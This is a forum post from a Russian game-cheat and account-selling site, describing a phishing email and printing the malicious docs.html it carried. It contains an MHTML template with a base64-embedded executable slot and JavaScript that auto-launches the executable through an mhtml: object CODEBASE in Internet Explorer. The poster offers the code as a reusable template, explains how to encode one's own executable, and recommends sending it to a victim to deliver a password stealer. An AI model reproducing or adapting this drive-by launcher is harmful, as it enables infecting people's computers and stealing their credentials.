Запуск Ехе-файла через Html страницу [Без софта] - Форум - Cheat-Master.Ru | Читерский Форум | Читы для SAMP,CS,Minecraft,CoD,Warface | Продажа аккаунтов SAMP,WoT,Steam,Origin,Warface | Баги,статьи SAMP-RP,Advance-RP,Diamond-RP | Магазин аккаунтов SAMP-RP,Advance-RP,Diamond-RP,Steam,WoT,Warface

Страница 1 из 11
Модератор форума: [CM]Russel 
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Запуск Ехе-файла через Html страницу [Без софта]
Sargon™Дата: Суббота, 22.10.2016, 20:25 | Сообщение # 1
Новичок
Группа: Заблокированные
Сообщений: 3
Статус: Offline
Войдите на сайт или зарегистрируйтесь для просмотра полного содержимого темы.

Сидел я и ползал по просторам интернета и решил проверить свой почтовый ящик.
Там оказалось недавно пришедшее письмо странного содержания.
В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь.
Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно.
К письму был прикреплен архив, защищенный паролем.
А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов.
Пароль к архиву подошел, и передо мной предстал ни в чем не повинный html файлик объемом всего в 15 килобайт.
Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e).
Откылся Блокнот, с содержанием файла docs.html.

Код
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page!
Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>' <img src="/.s/sm/2/wink.gif" border="0" align="absmiddle" alt="wink" />
}
setTimeout("malware()",150)
</script>


Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет.
Перед вами макет автозапуска вируса из html файла.
Его можно использовать и для ваших творений.
Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла.
А код можно легко получить следующим образом...
Зайдите в почтовый клиент и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла".
Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла.
И все,отправляем жертве. Хороший способ для отправки стилера.
Ccылки
Найти еще что-нибудь в магазине:
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Страница 1 из 11
Поиск:
Статистика Форума
Последнии темы Читаемые темы Лучшие пользователи Новые пользователи
Как заработать деньжат на... [killerdance1]

[Diamond RP-310Р][Advance... [Fontantik]

Покупка\продажа ARP и... [VitoM]

Информация для тех, у ког... [[CM]QahhaDem]

[FPSUP] Повышаем ФПС ( дл... [[CM]QahhaDem]

Куплю админку на SAMP-RP ... [apps777]

CLEO F@st Connect for SAM... [KIYOSHI228]

Плачу за прокачку аккунта... [[CM]QahhaDem]

1533341 klikklaks Невалид [klikklaks]

[CLEO] GetCars + SpeedHac... [[CM]QahhaDem]

[1]>S0beit - pr9n project for samp 0.3.7 [9436]

[2]>RakBot 0.6.6 - прокачка аккаунтов без GTA [9139]

[3]>Часто задаваемые вопросы... [8113]

[4]>Новогодние цены 1кк 350р АРП ДРП АМАЗИНГ [7534]

[5]>Вопросы и ответы [6225]

[6]>[0.3.7][RUS] Sobeit modified by MishaN [6131]

[7]>Продажа вирт 1кк АМЕРП~ 400р АРП~400р ДРП~400р.СРП~150р. [5907]

[8]>SAMP-Bot 0.5.9 by Jamely [4630]

[9]>Бесконечное слово [4525]

[10]>[Samp-Rp.Ru]Обновлен список Админов (27.01.2016) [4112]

[11]>[CLEO] Вопрос - Ответ [4028]

[12]>Курилка [3131]

[1]>АК_47 [22427]

[2]>GеNius [6345]

[3]>romka619 [5378]

[4]>[CM]AGRESSOR [4591]

[5]>baffometi [4423]

[6]>Snake_Firm [4136]

[7]>[CM]Russel [4041]

[8]>Artem_Buero [3943]

[9]>sky_Woker [3031]

[10]>[CM]Durman [2879]

[11]>iMaddy [2853]

[12]>Sa1nteD [2560]

[13]>zetkolya [2522]

[14]>Logan™ [2500]

[15]>Ch0c0Cube [2409]

wer452 [24.01.2017|07:54]

Belliar [24.01.2017|07:38]

Iosif228 [24.01.2017|07:34]

programer40 [24.01.2017|07:21]

sataniwe14 [24.01.2017|07:06]

Alekc1122003 [24.01.2017|06:57]

Hiopiо[CМ] [24.01.2017|06:44]

sidor-pidor [24.01.2017|06:18]

Lolipop2281337matiebal [24.01.2017|05:58]

mamapapy [24.01.2017|05:56]

ANYBODYKILLHIM [24.01.2017|05:44]

loginNew [24.01.2017|05:21]

Vellou56 [24.01.2017|05:09]

Pronnes [24.01.2017|04:32]

leonwenser [24.01.2017|04:31]


CM Team © 2009-2017 Администрация не несёт ответственности за размещённые материалы. Условия пользования
Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.

Положение о защите персональных данных на сайте, Пользовательское соглашение, Договор оказания услуг.